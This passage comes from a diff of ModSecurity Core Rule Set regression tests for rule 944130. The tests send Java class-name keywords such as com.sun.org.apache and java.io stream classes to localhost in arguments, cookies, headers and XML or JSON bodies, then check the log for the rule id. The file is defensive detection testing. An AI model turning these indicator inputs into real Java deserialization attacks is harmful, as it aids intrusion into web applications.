"POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-17 + desc: "XML element value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-18 + desc: "Nested XML element value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-19 + desc: "Content-Type text/plain includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-20 + desc: "Content-Type application/json arg value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"com.sun.org.apache\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-21 + desc: "Content-Type application/json arg name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"com.sun.org.apache\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-22 + desc: "Argument test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-23 + desc: "Argument name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-24 + desc: "Cookie test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-25 + desc: "Cookie name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-26 + desc: "Request header test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-27 + desc: "XML attribute value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-28 + desc: "XML element value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-29 + desc: "Nested XML element value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-30 + desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-31 + desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-32 + desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.BufferedInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-33 + desc: "Argument test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-34 + desc: "Argument name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-35 + desc: "Cookie test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-36 + desc: "Cookie name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-37 + desc: "Request header test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-38 + desc: "XML attribute value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-39 + desc: "XML element value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-40 + desc: "Nested XML element value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-41 + desc: "Content-Type text/plain includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-42 + desc: "Content-Type application/json arg value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-43 + desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.BufferedReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-44 + desc: "Argument test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-45 + desc: "Argument name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-46 + desc: "Cookie test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-47 + desc: "Cookie name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-48 + desc: "Request header test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-49 + desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-50 + desc: "XML element value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-51 + desc: "Nested XML element value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-52 + desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-53 + desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-54 + desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-55 + desc: "Argument test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-56 + desc: "Argument name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-57 + desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-58 + desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-59 + desc: "Request header test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-60 + desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-61 + desc: "XML element value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-62 + desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + 